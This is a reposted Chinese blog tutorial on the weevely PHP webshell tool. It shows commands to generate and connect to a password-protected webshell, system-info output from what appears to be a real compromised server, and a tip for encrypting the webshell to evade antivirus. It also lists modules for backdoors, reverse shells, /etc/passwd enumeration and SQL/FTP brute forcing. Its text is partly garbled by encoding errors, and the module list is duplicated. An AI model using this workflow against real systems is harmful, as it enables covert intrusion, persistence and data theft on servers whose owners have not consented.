weevely-------linux中的菜刀(转载)
weevely 是BT5中一個(gè)常用的webshell后門(mén)連接工具,它發(fā)揮的作用類(lèi)似于中國(guó)菜刀(chopper)。
root@bt:/pentest/backdoors/web/weevely# ./weevely.py generate ices gen.php
// 生成一個(gè)密碼為 ices 的php webshell.
root@bt:/pentest/backdoors/web/weevely# ./weevely.py http://app.*.cn/common/gen.php ices
// ./weevely.py http://*.com/webshell.php [password]???????? 連接
apache@HQEBWEBJ:/app/ecccs/web/common$ :system.info
// 按兩下 tab鍵,進(jìn)入操控模式,例如輸入 system.info 獲得系統(tǒng)信息
whoami:?????? apache
hostname:??? HQEBWEBJ
basedir:???????????????? /app/ecccs/web/common
uname:??????????? Linux HQEBWEBJ 2.6.18-92.el5 #1 SMP Tue Apr 29 13:16:15 EDT 2008 x86_64 GNU/Linux
os:???????????????????? Linux
document_root:? /home/ecccs/web
safe_mode:?????????? 0
script:???????????????????? /common/gen.php
client_ip:?????????????? 120.3*.56.156
max_execution_time:? 30
php_self:????????????????????????? /common/gen.php
apache@HQEBWEBJ:/app/ecccs/web/common$ cat /etc/issue
Red Hat Enterprise Linux Server release 5.2 (Tikanga) Kernel
// 執(zhí)行一般的命令
加密功能
冷冷的夜提取了weevely的php加密模塊? (其實(shí)這才是本文的亮點(diǎn),用來(lái)免殺webshell)
$ python test.py? 原.php? 密.php
如下圖,加密后的php一句話webshell代碼中,只出現(xiàn)了str_replace這個(gè)熟知的函數(shù),未出現(xiàn)其他關(guān)鍵字,這要查殺是非常難滴。
?
功能模塊
系統(tǒng) system.info???????????? //收集系統(tǒng)信息 文件 file.read?????????????????? //讀文件 file.upload?????????????? //上傳本地文件 file.check???????????????? //檢查文件的權(quán)限和 file.enum???????????????? //在本地詞表的書(shū)面枚舉遠(yuǎn)程文件 file.download????????? //下載遠(yuǎn)程二進(jìn)制/ ASCII文件到本地 SQL sql.query??????????????? //執(zhí)行SQL查詢 sql.console??????????? //啟動(dòng)SQL控制臺(tái) sql.dump?????????????? //獲取SQL數(shù)據(jù)庫(kù)轉(zhuǎn)儲(chǔ) sql.summary???????? //獲取SQL數(shù)據(jù)庫(kù)中的表和列 后門(mén) backdoor.tcp?????????????????????? //TCP端口后門(mén) backdoor.install????????????????? //安裝后門(mén) backdoor.reverse_tcp??????? //反彈 枚舉 audit.user_files????????????????? //在用戶家中列舉常見(jiàn)的機(jī)密文件 audit.user_web_files??????? //列舉常見(jiàn)的Web文件 audit.etc_passwd????????????? //枚舉/etc/passwd 查找 find.webdir???????????? //查找可寫(xiě)的web目錄 find.perm???????????????????? //查找權(quán)限可讀/寫(xiě)/可執(zhí)行文件和目錄 find.name??????????????????? //按名稱(chēng)查找文件和目錄 find.suidsgid??????????????? //查找SUID / SGID文件和目錄 暴破 bruteforce.sql??????????????????? //暴力破解單一SQL用戶 bruteforce.sql_users??????? //暴力破解SQL密碼 bruteforce.ftp??????????????????? // 暴力破解單一FTP用戶 bruteforce.ftp_users???????? //暴力破解FTP密碼 系統(tǒng) system.info?? //收集系統(tǒng)信息 文件 file.read??????? //讀文件 file.upload??????? //上傳本地文件 file.check??????? //檢查文件的權(quán)限和 file.enum??????? //在本地詞表的書(shū)面枚舉遠(yuǎn)程文件 file.download??????? //下載遠(yuǎn)程二進(jìn)制/ ASCII文件到本地 SQL sql.query??????? //執(zhí)行SQL查詢 sql.console??????? //啟動(dòng)SQL控制臺(tái) sql.dump??????? //獲取SQL數(shù)據(jù)庫(kù)轉(zhuǎn)儲(chǔ) sql.summary??????? //獲取SQL數(shù)據(jù)庫(kù)中的表和列 后門(mén) backdoor.tcp??????????????? //TCP端口后門(mén) backdoor.install??????? //安裝后門(mén) backdoor.reverse_tcp??????? //反彈 枚舉 audit.user_files??????? //在用戶家中列舉常見(jiàn)的機(jī)密文件 audit.user_web_files??????? //列舉常見(jiàn)的Web文件 audit.etc_passwd??????? //枚舉/etc/passwd 查找 find.webdir??????? //查找可寫(xiě)的web目錄 find.perm??????? //查找權(quán)限可讀/寫(xiě)/可執(zhí)行文件和目錄 find.name??????? //按名稱(chēng)查找文件和目錄 find.suidsgid??????? //查找SUID / SGID文件和目錄 暴破 bruteforce.sql??????????????? //暴力破解單一SQL用戶 bruteforce.sql_users??????? //暴力破解SQL密碼 bruteforce.ftp?????????????? // 暴力破解單一FTP用戶 bruteforce.ftp_users??????? //暴力破解FTP密碼
weevely–linux中的菜刀轉(zhuǎn)載于:https://www.cnblogs.com/demonspider/archive/2013/04/05/3001139.html
總結(jié)
以上是生活随笔為你收集整理的weevely-------linux中的菜刀(转载)的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: 使用Subversion版本标识符
- 下一篇: LINUX修改文件权限 学习